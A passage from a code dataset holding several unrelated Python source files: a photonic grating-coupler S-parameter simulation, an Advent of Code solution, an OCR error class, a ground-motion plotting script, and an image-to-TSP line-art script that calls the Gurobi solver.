fiber source.\n fiber_xoffset: fiber center xoffset to fiber_port_name.\n fiber_z: fiber zoffset from grating zmax.\n fiber_mfd: fiber mode field diameter (um).\n fiber_angle_deg: fiber_angle in degrees with respect to normal.\n material_name_to_tidy3d: dispersive materials have a wavelength dependent index.\n Maps layer_stack names with tidy3d material database names.\n is_3d: True by default runs in 3D.\n with_all_monitors: stores all monitor fields.\n\n \"\"\"\n component = gf.get_component(component)\n if not isinstance(component, Component):\n raise ValueError(f\"component should be a gdsfactory.Component not {component}\")\n\n filepath = filepath or get_sparameters_path(\n component=component,\n dirpath=dirpath,\n **kwargs,\n )\n filepath = pathlib.Path(filepath).with_suffix(\".npz\")\n filepath_sim_settings = filepath.with_suffix(\".yml\")\n\n if filepath.exists() and not overwrite and run:\n logger.info(f\"Simulation loaded from {filepath!r}\")\n return dict(np.load(filepath))\n\n sim = get_simulation_grating_coupler(\n component,\n fiber_port_prefix=fiber_port_prefix,\n port_waveguide_name=port_waveguide_name,\n **kwargs,\n )\n if not run:\n plot_simulation(sim)\n return {}\n\n start = time.time()\n sim_data = get_results(sim, verbose=verbose)\n sim_data = sim_data.result()\n\n direction_inp = \"+\"\n monitor_entering = (\n sim_data.monitor_data[\"waveguide\"]\n .amps.sel(direction=direction_inp)\n .values.flatten()\n )\n direction_out = \"-\"\n monitor_exiting = (\n sim_data.monitor_data[\"waveguide\"]\n .amps.sel(direction=direction_out)\n .values.flatten()\n )\n r = monitor_entering / monitor_exiting\n t = monitor_exiting\n\n fiber_port_name = None\n for port_name in component.ports.keys():\n if port_name.startswith(fiber_port_prefix):\n fiber_port_name = port_name\n\n if fiber_port_name is None:\n raise ValueError(\n f\"No port named {fiber_port_prefix!r} in {component.ports.keys()}\"\n )\n\n freqs = sim_data.monitor_data[\"waveguide\"].amps.sel(direction=\"+\").f\n port_name_input = port_waveguide_name\n fiber_port_name = \"o2\"\n\n key = f\"{port_name_input}@0,{port_name_input}@0\"\n sp = {\"wavelengths\": td.constants.C_0 / freqs.values, key: r}\n key = f\"{fiber_port_name}@0,{fiber_port_name}@0\"\n sp[key] = r\n\n key = f\"{port_name_input}@0,{fiber_port_name}@0\"\n sp[key] = t\n\n key = f\"{fiber_port_name}@0,{port_name_input}@0\"\n sp[key] = t\n\n end = time.time()\n np.savez_compressed(filepath, **sp)\n kwargs.update(compute_time_seconds=end - start)\n kwargs.update(compute_time_minutes=(end - start) / 60)\n\n filepath_sim_settings.write_text(yaml.dump(clean_value_json(kwargs)))\n logger.info(f\"Write simulation results to {str(filepath)!r}\")\n logger.info(f\"Write simulation settings to {str(filepath_sim_settings)!r}\")\n return sp\n\n\ndef write_sparameters_grating_coupler_batch(\n jobs: List[Dict[str, Any]], **kwargs\n) -> List[Awaitable[Sparameters]]:\n \"\"\"Returns Sparameters for a list of write_sparameters.\n\n Each job runs in separate thread and is non blocking.\n You need to get the results using sp.result().\n\n Args:\n jobs: list of kwargs for write_sparameters_grating_coupler.\n kwargs: simulation settings.\n \"\"\"\n kwargs.update(verbose=False)\n return [\n _executor.submit(write_sparameters_grating_coupler, **job, **kwargs)\n for job in jobs\n ]\n\n\nif __name__ == \"__main__\":\n c = gf.components.grating_coupler_elliptical_lumerical() # inverse design grating\n offsets = [0, 5]\n offsets = [0]\n fiber_angle_deg = 8\n sp = write_sparameters_grating_coupler(c, is_3d=False)\n\n # dfs = [\n # write_sparameters_grating_coupler(\n # component=c,\n # is_3d=False,\n # fiber_angle_deg=fiber_angle_deg,\n # fiber_xoffset=fiber_xoffset,\n # filepath=PATH.sparameters_repo / f\"gc_offset{fiber_xoffset}.npz\",\n # )\n # for fiber_xoffset in offsets\n # ]\n\n # jobs = [\n # dict(\n # component=c,\n # is_3d=False,\n # fiber_angle_deg=fiber_angle_deg,\n # fiber_xoffset=fiber_xoffset,\n # filepath=PATH.sparameters_repo\n # / f\"gc_angle{fiber_angle_deg}_offset{fiber_xoffset}\",\n # )\n # for fiber_xoffset in offsets\n # ]\n # sps = write_sparameters_grating_coupler_batch(jobs)\n\n # import matplotlib.pyplot as plt\n # import gplugins as sim\n\n # sp = write_sparameters_grating_coupler(\n # c,\n # is_3d=False,\n # fiber_angle_deg=-5,\n # fiber_xoffset=+2,\n # )\n\n # sim.plot.plot_sparameters(sp)\n\n # c = gf.components.grating_coupler_elliptical_arbitrary(\n # widths=[0.343] * 25,\n # gaps=[0.345] * 25,\n # )\n # sp = write_sparameters_grating_coupler(c, is_3d=False)\n # t = sp.o1@0,o2@0\n # print(f\"Transmission = {t}\")\n\n # plt.plot(sp.wavelengths, sp.o1@0,o2@0)\n # plt.show()\n","repo_name":"gdsfactory/gplugins","sub_path":"gplugins/tidy3d/write_sparameters_grating_coupler.py","file_name":"write_sparameters_grating_coupler.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"26718237944","text":"with open('day6-input', 'r') as file:\n data = [l.strip('\\n') for l in file]\nimport numpy as np\ncoords = [[int(i.rstrip(',')) for i in c.split()] for c in data]\n\ndef distance(c1, c2):\n dx = abs(c1[0]-c2[0])\n dy = abs(c1[1]-c2[1])\n return dx+dy\n\ndistances = {}\nfor coord in coords:\n distances[tuple(coord)] = [distance(coord, c2) for c2 in coords if c2 is not coord]\n\ncell_coord = max(distances.items(), key=lambda x: min(x[1]))\nfield = np.zeros((500,500))\n\nblacklist = set()\nfor c1 in [(x,y) for x in range(500) for y in range(500)]:\n distances = [distance(c1, c2) for c2 in coords]\n min_dist = min(distances)\n if distances.count(min_dist) == 1:\n cell = min(enumerate(distances), key=lambda x: x[1])[0]\n field[c1] = cell\n x, y = c1\n if x == 0 or y == 0 or x == 499 or y == 499:\n blacklist.add(cell)\na = [(field == i).sum() for i in range(len(coords)) if i not in blacklist]\nprint(max(a)) # Part 1\n\n#sumarea = 0\nexpensive_size = 400 # Needs to fit all coords\nedge_extend_size = 10000 # Increase if necessary\nregion = np.zeros((edge_extend_size,edge_extend_size))\nfor c1 in [(x,y) for x in range(-expensive_size, expensive_size) for y in range(-expensive_size, expensive_size)]:\n total_dist = sum([distance(c1, c2) for c2 in coords])\n #if total_dist < 10000:\n #sumarea += 1\n region[c1] = total_dist\n#print(sumarea)\n\ntotal_inc = len(coords)\n\nr = region.copy()\nfor i in range(expensive_size, edge_extend_size//2+1):\n r[i,:] = r[i-1,:]+total_inc\nfor i in range(-expensive_size, -edge_extend_size//2, -1):\n r[i,:] = r[i+1,:]+total_inc\nfor i in range(expensive_size, edge_extend_size//2+1):\n r[:,i] = r[:,i-1]+total_inc\nfor i in range(-expensive_size, -edge_extend_size//2, -1):\n r[:,i] = r[:,i+1]+total_inc\n\nprint((r < 10000).sum()) # Part 2\n","repo_name":"Birdulon/AdventOfCode","sub_path":"2018/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4545033165","text":"from typing import Dict\n\n\nclass OCRError(Exception):\n # all codes from https://ocr.space/ocrapi\n OCR_EXIT_CODES = {\n 1: \"parsed successfully\",\n 2: \"parsed partially\",\n 3: \"ENGINE ERROR: all pages failed\",\n 4: \"ENGINE ERROR: FATAL\",\n 6: \"Timed out while waiting for results\",\n 99: \"Not a valid URL; invalid image or pdf\",\n # our error message for a request that is very, very broken\n 999: \"Something went horribly wrong\",\n }\n\n PAGE_EXIT_CODES = {\n 1: \"success\",\n 0: \"file not found\",\n -10: \"OCR engine parse error\",\n -20: \"timeout\",\n -30: \"validation error\",\n -99: \"UNKNOWN ERROR\",\n 3: \"File failed validation\", # This is not documented, beware!\n }\n\n def __init__(self, result: Dict) -> None: # noqa D107\n super(OCRError, self).__init__(\n self.PAGE_EXIT_CODES.get(\n result[\"exit_code\"],\n f\"Unrecognized error: Code {result['exit_code']}, \"\n f\"{result['error_message']}: {result['error_details']}\",\n )\n )\n self.result = result\n","repo_name":"GrafeasGroup/blossom","sub_path":"blossom/ocr/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"11704175104","text":"from __future__ import division, print_function\n\n# Import Python modules\nimport os\nimport sys\nimport math\nimport numpy as np\nimport scipy.stats as st\nimport matplotlib as mpl\nif mpl.get_backend() != 'agg':\n mpl.use('Agg') # Disables use of Tk/X11\nimport pylab\n\nCOLORS2 = [\"red\", \"yellow\", \"sandybrown\", \"lime\", \"darkorange\", \"khaki\",\n \"yellowgreen\", \"violet\", \"palegreen\", \"turquoise\", \"gold\",\n \"cyan\", \"dodgerblue\", \"blueviolet\", \"magenta\",\n \"deeppink\", \"brown\", \"teal\", \"wheat\", \"silver\"]\nCOLORS = [\"red\", \"cyan\", \"gold\", \"lime\", \"blueviolet\",\n \"cyan\", \"gold\", \"lime\", \"blueviolet\", \"red\",\n \"gold\", \"lime\", \"blueviolet\", \"red\", \"cyan\",\n \"lime\", \"blueviolet\", \"red\", \"cyan\", \"gold\"]\nMARKERS = [\"+\", \"*\", \"^\", \"o\", \"x\",\n \"+\", \"*\", \"^\", \"o\", \"x\",\n \"+\", \"*\", \"^\", \"o\", \"x\",\n \"+\", \"*\", \"^\", \"o\", \"x\"]\n\ndef read_data(input_file):\n \"\"\"\n This function reads the input file and loads the data into\n our data structures\n \"\"\"\n rrup = None\n data = []\n ifile = open(input_file, 'r')\n for line in ifile:\n line = line.strip()\n # Skip empty lines\n if not line:\n continue\n # Skip comments\n if line.startswith(\"%\") or line.startswith(\"#\"):\n continue\n # Skip Average lines\n if line.startswith(\"Average\"):\n continue\n if line.startswith(\"Mechanism\"):\n # Done with this file!\n break\n if line.startswith(\"Rrup\"):\n # Process Rrup line\n pieces = line.split()\n distances = pieces[2]\n pieces = [float(piece) for piece in distances.split(\"-\")]\n rrup = np.mean(pieces)\n continue\n # Real data line, process it!\n pieces = line.split()[1:]\n pieces = [np.nan if piece == \"N/A\" else piece for piece in pieces]\n pieces = [float(piece) for piece in pieces]\n pieces.insert(0, rrup)\n pieces.append(line.split()[0])\n data.append(pieces)\n ifile.close()\n\n # All done, return data array\n return data\n\ndef summarize_and_plot_data(data, method, output_file):\n \"\"\"\n Summarized all data into the format we need for plotting\n \"\"\"\n mean_data = {}\n bins = 4\n titles = [\"0.01 to 0.1s\",\n \"0.1 to 1s\",\n \"1 to 3s\",\n \"> 3s\"]\n locs = [[0,0], [0,1], [1,0], [1,1]]\n event_names = np.array([piece[-1] for piece in data])\n\n # Calculate mean_data\n start = 1\n step = 3\n\n # Create fig\n fig, axs = pylab.plt.subplots(2, 2)\n fig.set_size_inches(17, 8.5)\n fig.suptitle(\"Method: %s\" % (method))\n fig.subplots_adjust(hspace=0.4)\n fig.subplots_adjust(left=0.05)\n fig.subplots_adjust(right=0.98)\n\n current = start\n for bin in range(0, bins):\n mean_data[bin] = {}\n mean_data[bin]['mean'] = np.array([piece[current] for piece in data])\n mean_data[bin]['n'] = np.array([piece[current+2] for piece in data])\n current = current + step\n\n # List of distances\n r = np.array([piece[0] for piece in data])\n \n # Process each bin\n for bin in range(0, bins):\n x = np.log(r[~np.isnan(mean_data[bin]['mean'])])\n y = mean_data[bin]['mean'][~np.isnan(mean_data[bin]['mean'])]\n event_data = []\n event_legend = []\n e_labels = event_names[~np.isnan(mean_data[bin]['mean'])]\n e_labels_set = sorted(list(set(e_labels)), key=str.lower)\n # First we create a list events/markers/colors for the legend\n for index, event in enumerate(e_labels_set):\n event_legend.append([event, COLORS[index], MARKERS[index]])\n print(\"%s - %s - %s\" % (event, COLORS[index], MARKERS[index]))\n for index, event in enumerate(e_labels_set):\n event_x = []\n event_y = []\n for label, x_val, y_val in zip(e_labels, x, y):\n if label == event:\n event_x.append(x_val)\n event_y.append(y_val)\n if len(event_x):\n event_data.append([event_x, event_y,\n COLORS[index], MARKERS[index]])\n\n ww = mean_data[bin]['n'][~np.isnan(mean_data[bin]['n'])]\n numdata = len(y)\n\n A = np.array([list(np.ones(len(x))), x])\n A = A.T\n W = np.diag(ww)\n b = np.linalg.lstsq(((A.T).dot(W)).dot(A),\n ((A.T).dot(W)).dot(np.array(y).T),\n rcond=-1)[0]\n intercept = b[0]\n slope = b[1]\n\n degfree = len(x) - 2\n e = y - (intercept + slope * x)\n var = np.sum(e * e) / degfree\n se_y = np.sqrt(var)\n sdev = np.sqrt(var)\n se_b = sdev / np.sqrt(np.sum((x - np.mean(x)) * (x - np.mean(x))))\n se_a = sdev * np.sqrt(1.0 / len(x) + np.mean(x) * np.mean(x) /\n np.sum((x - np.mean(x)) * (x - np.mean(x))))\n\n xx = np.linspace(min(x), max(x),\n num=(int(math.ceil((max(x) - min(x)) / 0.1))))\n yy = slope * xx + intercept\n\n # Calculate 95% confidence bounds\n t = st.t.ppf(1.0 - 0.05 / 2, degfree)\n b95 = se_b * t\n a95 = se_a * t\n ratio = abs(slope) / b95\n ratio_round = round(ratio * 100) / 100.0\n lower95 = yy - t * se_y * np.sqrt(1.0 /\n len(x) + ((xx - np.mean(x)) *\n (xx - np.mean(x))) /\n np.sum((xx - np.mean(x)) *\n (xx - np.mean(x))))\n upper95 = yy + t * se_y * np.sqrt(1.0 /\n len(x) + ((xx - np.mean(x)) *\n (xx - np.mean(x))) /\n np.sum((xx - np.mean(x)) *\n (xx - np.mean(x))))\n\n # Let's plot it\n p_x = locs[bin][0]\n p_y = locs[bin][1]\n subfig = axs[p_x][p_y]\n subfig.set_title(\"%s - Ratio: %.2f\" % (titles[bin], ratio_round))\n for event in event_data:\n event_x = event[0]\n event_y = event[1]\n event_color = event[2]\n event_marker = event[3]\n subfig.plot(event_x, event_y,\n event_marker, color=event_color)\n #subfig.plot(x, y, 'k+')\n subfig.plot(xx, yy, color='green', ls='-')\n subfig.plot(xx, lower95, 'r--', xx, upper95, 'r--')\n subfig.set_ylabel('ln(data/model)', size=10)\n subfig.set_xlabel('ln(distance(km))', size=10)\n subfig.set_xlim(0, 6)\n subfig.set_ylim(-1.5, 1.5)\n subfig.grid(True)\n subfig.minorticks_on()\n\n # All done, save plot!\n fig.savefig(output_file, format='png', transparent=False,\n dpi=300)\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n if len(sys.argv) != 2:\n print(\"Usage: %s input_file\" % (sys.argv[0]))\n sys.exit(0)\n\n # Output filename\n input_file = sys.argv[1]\n output_file = \"%s.png\" % (os.path.splitext(input_file)[0])\n method = os.path.basename(input_file).split(\"-\")[0].upper()\n\n # Read input file\n data = read_data(input_file)\n summarize_and_plot_data(data, method, output_file)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SCECcode/bbp","sub_path":"bbp/utils/misc/create_dreger_fig3_color.py","file_name":"create_dreger_fig3_color.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"36796462745","text":"import math \nimport numpy as np\nfrom PIL import Image\nimport subprocess\nimport os.path\nimport cairo\nimport random as rd\n\n\n# ============================== DATA ==============================\nlpMathSymbols = [\"+\", \"-\", \"=\", \"<=\", \"<\", \">\", \">=\"]\n\n# ============================== CODE ==============================\ndef printDico(dico):\n for e in dico:\n print(e, \":\", dico[e])\n\ndef tupleSet2sortedTupleList(tupleSet: set):\n res = list(tupleSet)\n return sorted(res)\n\n# =============== ENVIRONNEMENT MANAGING ===============ojccv\n\ndef createDirectory(dirName):\n parentPath = os.getcwd()\n path = os.path.join(parentPath, dirName)\n if not os.path.isdir(path):\n os.mkdir(path)\ndef createAllDirectories():\n createDirectory(\"Raw\") \n createDirectory(\"LPFiles\") \n createDirectory(\"SolFiles\") \n createDirectory(\"LogFiles\") \n createDirectory(\"Results\") \n\n# =============== GETS ===============\n\ndef getRawName(fileName):\n path = os.getcwd()\n return path + \"/Raw/\" + fileName + \".jpg\"\ndef getLpName(fileName):\n path = os.getcwd()\n return path + \"/LPFiles/\" + fileName + \".lp\"\ndef getSolName(fileName):\n path = os.getcwd()\n return path + \"/SolFiles/\" + fileName + \".sol\"\ndef getLogName(fileName): \n path = os.getcwd()\n return path + \"/LogFiles/\" + fileName + \".log\"\ndef getSvgName(fileName):\n path = os.getcwd()\n return path + \"/Results/\" + fileName + \".svg\"\n\ndef get_a_b_from_var(var: str):\n coords = var[2:]\n coords = coords.replace(\"_\",\" \")\n coords = coords.split()\n a = coords[0]\n b = coords[1]\n return int(a), int(b)\ndef get_cost_a_b(a,b):\n return int(math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2))\ndef get_a_form_coords(x,y, graphCoords):\n for e in graphCoords:\n if (x,y) == e:\n return e\n else:\n raise Exception(\"Coords not here.\")\n\ndef get_connected_vertices(middle, graphMatrix):\n if middle >= len(graphMatrix):\n raise Exception (\"Vertice not in graph\")\n \n before = 0 \n while graphMatrix[middle][before] == 0 and before < len(graphMatrix[0]):\n before += 1\n \n if before >= len(graphMatrix[0]):\n raise Exception (\"No connected Vertices\")\n\n \n after = before + 1 \n while graphMatrix[middle][after] == 0 and after < len(graphMatrix[0]):\n after += 1\n\n if after >= len(graphMatrix[0]):\n raise Exception (\"Only one connected vertex:,\", middle ,\" to \", before)\n \n return before, after\ndef get_previous_vertice(vertex, graphMatrix):\n return get_connected_vertices(vertex, graphMatrix)[0]\ndef get_following_vertice(vertex, graphMatrix):\n return get_connected_vertices(vertex, graphMatrix)[1]\n\ndef get_subtour(start, graphMatrix):\n previous, next = get_connected_vertices(start, graphMatrix)\n if previous == next and next == 0:\n return []\n \n current = next\n res = [start]\n while current != start:\n res.append(current)\n before, after = get_connected_vertices(current, graphMatrix)\n if after in res:\n current = before\n else:\n current = after\n if len(res) > len(graphMatrix):\n raise Exception(\"End point never found\")\n return res\ndef get_all_subtours(graphMatrix):\n hasToBeSeen = [i for i in range(len(graphMatrix))]\n subtoursTab = []\n while len(hasToBeSeen) > 0:\n subtour = get_subtour(hasToBeSeen[0], graphMatrix)\n subtoursTab.append(subtour)\n hasToBeSeen = [i for i in hasToBeSeen if i not in subtour]\n return subtoursTab\n\n# =============== RASTERIZATION ===============\ndef cropImage(input, blocksize):\n output = input[:input.find('.')] + \"Cropped.png\"\n \n im = Image.open(input)\n width, height = im.size\n decHeight = height - (height % blocksize)\n decWidth = width - (width % blocksize)\n im1 = im.crop((0, 0, decWidth, decHeight))\n im1 = im1.save(output)\n return im1\n \ndef image2matrix(fileName, blocksize):\n fileName = fileName[:fileName.find('.')] + \".jpg\"\n\n image = Image.open(fileName).convert('RGB')\n \n image = Image.open(fileName).convert('L')\n width, height = image.size\n width = width//blocksize\n height = height//blocksize\n\n arrayIm = np.asarray(image) \n\n m = [[0 for j in range (width)] for i in range (height)]\n \n cpt = 0\n for i in range (height): \n for j in range(width):\n mean = 0\n for k in range(blocksize):\n for l in range(blocksize):\n mean = mean + (arrayIm[blocksize*i + k][blocksize*j + l])\n # m[i][j] = 10 - math.floor(mean/(255*(blocksize**2)) * 10)\n m[i][j] = 3 - int((mean/(255*(blocksize**2)) * 10)//3)\n cpt += m[i][j]\n\n image.close()\n print(\"There is \", cpt, \"Points.\")\n return m\n\n\ndef graphCoordsAndMatrixFromImage(imageName, blocksize):\n \n dotsDensityMatrix = image2matrix(imageName, blocksize)\n height = len(dotsDensityMatrix) \n width = len(dotsDensityMatrix[0]) \n\n res = set()\n for i in range(height):\n for j in range(width):\n\n for k in range(dotsDensityMatrix[i][j]): \n # on choisit k x et k y au hazard dans un pixel et\n # on les déplace dans l'image afin de coller au pixel\n # i j\n x = int(rd.random() * blocksize + j * blocksize)\n y = int(rd.random() * blocksize + i * blocksize)\n res.add((x,y))\n res = tupleSet2sortedTupleList(res)\n \n matrix = [ [0 for i in range(len(res))] for j in range(len(res))]\n for i in range(len(res)):\n for j in range(len(res)):\n matrix[i][j] = get_cost_a_b(res[i], res[j])\n\n return res, matrix\n\n# =============== DRAWINGS ===============\n\ndef showPointsOnly(resultFileName,imageName, blocksize):\n \n graphCoords, graphMatrix = graphCoordsAndMatrixFromImage(imageName, blocksize)\n\n image = Image.open(imageName).convert('L')\n width, height = image.size\n destination = cairo.SVGSurface(resultFileName, width, height)\n cr = cairo.Context(destination)\n \n cr.set_line_width(3)\n cr.set_source_rgb(1,1,1)\n cr.rectangle(0,0, width, height)\n cr.fill()\n\n cr.set_source_rgb(1,0,0)\n for i in range(len(graphCoords)):\n (x,y) = graphCoords[i]\n cr.move_to(x,y)\n cr.rectangle(x -1.5, y -1.5,3,3)\n cr.fill()\n return cr\n\ndef context2png(context, fileName):\n context.get_target().write_to_png(fileName + \".png\")\n\ndef graph2Context(resultFileName, graphMatrix, graphCoords, height, width): \n destination = cairo.SVGSurface(resultFileName, width, height)\n cr = cairo.Context(destination)\n \n cr.set_line_width(3)\n cr.set_source_rgb(1,1,1)\n cr.rectangle(0,0, width, height)\n cr.fill()\n\n cr.set_source_rgb(0,0,0)\n for i in range(len(graphMatrix)):\n for j in range(len(graphMatrix[0])):\n if graphMatrix[i][j] != 0:\n (x1,y1) = graphCoords[i]\n (x2,y2) = graphCoords[j]\n cr.move_to(x1, y1)\n cr.line_to(x2,y2) \n cr.stroke()\n return cr\n\ndef addContext(cr1,cr2, matrix, resultFileName, height, width):\n height = len(matrix)\n width = len(matrix[0])\n \n destination = cairo.SVGSurface(resultFileName + \"Together\", width, height)\n resCr = cairo.Context(destination)\n resCr.set_source_surface(cr1.get_target(), 0,0)\n resCr.paint()\n resCr.set_source_surface(cr2.get_target(), 0,0)\n resCr.paint()\n return resCr\n \n# =============== LINEAR PROBLEM ===============\n\ndef strTotalCostDistance(graphMatrix):\n res = \"\"\n for i in range(len(graphMatrix)):\n for j in range(len(graphMatrix[0])):\n if i != j :\n add = \"+ \" + strVar([i,j], graphMatrix[i][j]) \n res += add \n return res[2:]\n\ndef strVertexConstraintsExt(graphMatrix, indexA):\n res = \"\"\n for i in range(len(graphMatrix)):\n if i != indexA:\n add = \" + \" + strVar([i, indexA]) \n res += add \n res = res + \" = 2\"\n return res[2:]\n\ndef strLinksConstraints(i,j):\n res = \"\"\n res = strVar([i,j]) + \" - \" + strVar([j,i]) + \" = 0\"\n return res\n\ndef strSubtourConstraints(graphMatrix, subtour):\n hasToBeSeen = [i for i in range(len(graphMatrix)) if i not in subtour]\n res = \"\"\n for a in subtour:\n for b in hasToBeSeen:\n add = \" + \" + strVar([a, b]) \n res += add \n res = res + \" >= 2\"\n return res[2:]\n\n# =============== FILE CREATION ===============\ndef strVar(indexes: list, scalar = 1):\n res = str(scalar) + \" X\"\n for e in indexes:\n res += \"_\" + str(e) \n return res\n\ndef write(addition: str, fileName):\n f = open(fileName, \"a+\")\n f.write(addition)\n f.write(\"\\n\")\n f.close()\n\ndef decomposeExpr(expr: str):\n noOp = expr # expression sans opérateur\n for op in lpMathSymbols:\n noOp = noOp.replace(op, \" \") \n noOp = noOp.split() # tableau de var, coef et var_coef\n vars_coefs = {} # Init du dico correspondant aux vars + coeff\n operators = expr # opérateur : str == expr\n coefHolder = \"1\" # tant qu'on ne connait pas le coef, on dit que c'est 1\n\n for i in range(len(noOp)):\n operators = operators.replace(noOp[i],\" \",1) # on enlève les vars+coeff\n noOp[i] = noOp[i].replace(\" \", \"\")\n # noOp[i] ressemblera à : 8X1 ou 8 ou X1\n\n coef = \"\" # store le coef\n coefIndex = 0 # l'indice du coef\n\n # tant qu'on reste dans le str et que ce n'est pas une lettre\n while coefIndex < len(noOp[i]) and not noOp[i][coefIndex].isalpha():\n coef += noOp[i][coefIndex] # On l'ajoute comme coef\n coefIndex += 1 # On note sa fin\n\n var = noOp[i][coefIndex:] # On garde le reste\n if coef == \"\": # s'il n'y a pas de coef: alors soit \"X1\" avec facteur 1, soit \"X1\" avec coef dans coef holder \n vars_coefs[var] = coefHolder\n\n elif var == \"\": # s'il n'y a pas de variable: \"8\" => on le retiens pour plus tard (variable ou égalité)\n coefHolder = coef \n else: # il y a coef et var : \"8X1\"\n vars_coefs[var] = coef\n coefHolder = \"1\"\n operators = operators.split()\n return vars_coefs, operators, coefHolder\n\ndef str2Expr(expr: str):\n vars_coefs, operators, coefHolder = decomposeExpr(expr)\n res = \"\"\n if operators[0] == \"=\" or operators[0] == \"<=\" or operators[0] == \">=\":\n res += expr[0] + \" \" + operators[0] + \" \" \n cpt = 1\n for var in vars_coefs.keys():\n coef = vars_coefs[var]\n if coef == \"1\":\n res += \" \" + var + \" \" + operators[cpt] \n else :\n res += \" \" + coef + \" \" + var + \" \" + operators[cpt] \n cpt += 1\n res += \" \" + coefHolder\n return res\n\n else : \n cpt = 0 \n for var in vars_coefs.keys():\n coef = vars_coefs[var]\n if cpt == 0:\n if coef == \"1\":\n res += var\n else :\n res += coef + \" \" + var\n else:\n if coef == \"1\":\n res += \" \" + operators[cpt-1] + \" \" + var\n else:\n res += \" \" + operators[cpt-1] + \" \" + coef + \" \" + var\n cpt += 1\n\n if operators[-1] == \"=\" or operators[-1] == \"<=\" or operators[-1] == \">=\":\n res += \" \" + operators[-1] + \" \" + coefHolder\n return res\n\ndef createLPfileGraph(fileName, graphCoords, graphMatrix, allSubtours = [[]]):\n # graph ici correspond a un ensemble de point sans transiitions\n # il deviendra un graphe avec toutes les transtition possible sauf boucle\n # states correspond a une liste de tuple ordonné dans l'ordre alphabetique\n vars = decomposeExpr(strTotalCostDistance(graphMatrix))[0]\n\n # =============== MIN/MAX ===============\n \n write('minimize', fileName)\n totalCost = str2Expr(strTotalCostDistance(graphMatrix))\n write(totalCost, fileName)\n \n # =============== RESTRICTIONS ===============\n\n write(\"subject to\", fileName)\n\n for i in range(len(graphCoords)):\n \n vertexConstraintExt = strVertexConstraintsExt(graphMatrix, i)\n write(vertexConstraintExt, fileName)\n\n for i in range(len(graphCoords)):\n for j in range(len(graphCoords)):\n if i != j :\n LinksConstraints = strLinksConstraints(i,j)\n write(LinksConstraints, fileName)\n \n if len(allSubtours) != 1:\n for subtour in allSubtours:\n SubTourConstraint = strSubtourConstraints(graphMatrix, subtour)\n write(SubTourConstraint, fileName)\n\n\n # =============== BOUNDS ===============\n \n write(\"binary\", fileName)\n for v in vars:\n a,b = get_a_b_from_var(v)\n if a == b:\n raise Exception(\"a == b\")\n write(v, fileName)\n \n write(\"end\", fileName)\n \n return None\n\n# =============== MAIN ===============\n\ndef solFile2Graph(solFile, graphMatrix):\n with open(solFile) as f:\n cpt = 0\n for line in f:\n if cpt != 0:\n var, value = line.split() \n if value != \"1\":\n a, b = get_a_b_from_var(var)\n graphMatrix[a][b] = 0\n cpt += 1 \n return graphMatrix\n\ndef main(fileName, graphCoords, graphMatrix, height, width):\n createAllDirectories()\n allSubTours = [[]]\n cpt = 0\n numberOfSubTours = 0\n\n while numberOfSubTours != 1 and cpt < 10:\n lpName = getLpName(fileName + \"_\" + str(cpt))\n solName = getSolName(fileName + \"_\" + str(cpt))\n logName = getLogName(fileName + \"_\" + str(cpt))\n svgName = getSvgName(fileName + \"_\" + str(cpt))\n \n copyOfGraphMatrix = [row[:] for row in graphMatrix]\n\n if os.path.isfile(lpName): os.remove(lpName)\n createLPfileGraph(lpName, graphCoords, copyOfGraphMatrix, allSubTours)\n subprocess.run([\"gurobi_cl\", \"Resultfile=\" + solName , \"Logfile=\" + logName, \" Method=0\", lpName ])\n\n resultGraph = solFile2Graph(solName, copyOfGraphMatrix)\n if allSubTours == [[]]: allSubTours = get_all_subtours(resultGraph)\n\n drawing = graph2Context(svgName, resultGraph, graphCoords, height, width)\n for subTour in get_all_subtours(resultGraph):\n allSubTours.append(subTour)\n \n numberOfSubTours = len(get_all_subtours(resultGraph)) \n cpt += 1\n \n return drawing\n\ndef mainImage(fileName, blocksize):\n createAllDirectories()\n\n graphCoords, graphMatrix = graphCoordsAndMatrixFromImage(getRawName(fileName), blocksize)\n height = len(graphMatrix) \n width = len(graphMatrix[0]) \n allSubTours = [[]]\n cpt = 0\n numberOfSubTours = 0\n \n while numberOfSubTours != 1 and cpt < 50:\n lpName = getLpName(fileName + \"_\" + str(cpt))\n solName = getSolName(fileName + \"_\" + str(cpt))\n logName = getLogName(fileName + \"_\" + str(cpt))\n svgName = getSvgName(fileName + \"_\" + str(cpt))\n \n copyOfGraphMatrix = [row[:] for row in graphMatrix]\n\n if os.path.isfile(lpName): os.remove(lpName)\n createLPfileGraph(lpName, graphCoords, copyOfGraphMatrix, allSubTours)\n subprocess.run([\"gurobi_cl\", \"Resultfile=\" + solName , \"Logfile=\" + logName, \" Method=0\", lpName ])\n\n resultGraph = solFile2Graph(solName, copyOfGraphMatrix)\n if allSubTours == [[]]: allSubTours = get_all_subtours(resultGraph)\n\n drawing = graph2Context(svgName, resultGraph, graphCoords, height, width)\n for subTour in get_all_subtours(resultGraph):\n allSubTours.append(subTour)\n \n numberOfSubTours = len(get_all_subtours(resultGraph)) \n cpt += 1\n return drawing\n\n# ============================== TEST ==============================\n\n# print(createGraphWithRandomPoints(100,100, 10))\n# print(makeAllTransition(createGraphWithRandomPoints(100,100, 10)))\n# print(G.removeNullDistance(makeAllTransition(createGraphWithRandomPoints(100,100, 10))))\n\n\n# main(\"Test\", graphCoords, graphMatrix, 500, 500)\n\n# showPointsOnly(\"Results/Skull.svg\", \"Raw/Skull.jpg\" , 14)\n# mainImage(\"Skull\", 14)\n\n# print(image2matrix(\"Raw/Skull.jpg\", 10))\n# il y a 2229 points. Lancé le 6 Juillet à 17 h 45\n# graphCoords, graphMatrix = graphCoordsAndMatrixFromImage(getRawName(\"Eye\"), 10)\n# print(graphCoords)\n# print(graphMatrix)\n\"\"\"\n# print(graphMatrix)\n\ndef print_coords_list(list):\n for e in list:\n print(graphCoords[e])\n 